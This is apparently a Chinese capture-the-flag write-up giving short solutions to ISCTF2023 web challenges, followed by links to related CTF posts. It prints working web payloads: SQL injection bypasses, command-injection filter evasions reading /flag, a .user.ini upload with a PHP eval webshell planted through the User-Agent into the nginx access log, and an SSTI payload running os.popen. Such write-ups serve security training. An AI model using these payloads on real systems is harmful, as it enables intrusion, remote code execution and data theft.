[WP] ISCTF2023 Web 部分题解

圣杯战争!!!

反序列化+伪协议读取

where_is_the_flag

环境变量+根目录+当前目录

绕进你的心里

利用正则最大回溯绕过

easy_website

or select 用双写绕过 空格用/**/绕,报错注入

wafr

code=system('ca\t /f*')

webinclude

扫描得到index.bak备份文件打开为加密的代码 写个逆向脚本再反求parameter即可

复制代码
JavaScript
const hash = 'dxdydxdudxdtdxeadxekdxea';

function string_to_int_array(str) {
  const intArr = [];
  for (let i = 0; i < str.length; i++) {
    intArr.push(str.charCodeAt(i) - 97);
  }
  return intArr;
}

function int_array_to_string(int_array) {
  let str = '';
  for (let i = 0; i < int_array.length; i += 2) {
    const charcode = int_array[i] * 26 + int_array[i + 1];
    str += String.fromCharCode(charcode);
  }
  return str;
}

console.log(int_array_to_string(string_to_int_array(int_array_to_string(string_to_int_array(hash)))));

得到参数名 直接伪协议读取flag.php

ez_ini

ini文件上传 +UA头添加木马

.user.ini 文件:

复制代码
GIF89A
auto_append_file="/var/log/nginx/access.log"

木马:

复制代码
<?php @eval($_POST['wenda']);?

然后远程命令执行就行了

复制代码
POST:

wenda=system('tac /flag');

注意一下上传ini文件的时候 type类型要改成image/jpeg 或者/image/png 类型】

或者直接ini 文件直接读取file:///flag 就行

复制代码
auto_prepend_file=file:///flag

fuzz!

通配符【】绕过 字符过滤 管道符| 拼接命令

复制代码
?file=|tac /fl[a-z]ggggggg.txt

恐怖 G7

ssti注入:

复制代码
{{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('env').read()")}}
相关推荐
unable code2 天前
攻防世界-Rerverse-game
网络安全·ctf·reverse
unable code3 天前
攻防世界-Reverse-insanity
网络安全·ctf·reverse
还鮟3 天前
CTF Web PHP弱类型与进制绕过(过滤)
php·ctf
玥轩_52114 天前
BUUCTF [UTCTF2020]File Carving 1
安全·网络安全·elf·ctf·misc·buuctf·png隐写
wyjcxyyy19 天前
DIDCTF-应急响应
笔记·ctf·应急响应与电子取证
kali-Myon20 天前
攻防世界[level7]-Web_php_wrong_nginx_config
前端·nginx·安全·php·web·ctf·攻防世界
Bruce_Liuxiaowei24 天前
某靶场CTF题目:利用Apache APISIX默认Token漏洞(CVE-2020-13945)获取Flag
网络安全·apache·ctf
轨迹H1 个月前
【春秋云镜】CVE-2023-2130漏洞复现exp
网络协议·网络安全·渗透测试·ctf·cve
mottte1 个月前
BUUCTF[极客大挑战 2019]Havefun 1题解
php·web·ctf
mottte1 个月前
BUUCTF[ACTF2020 新生赛]Include 1题解
web·ctf·文件包含漏洞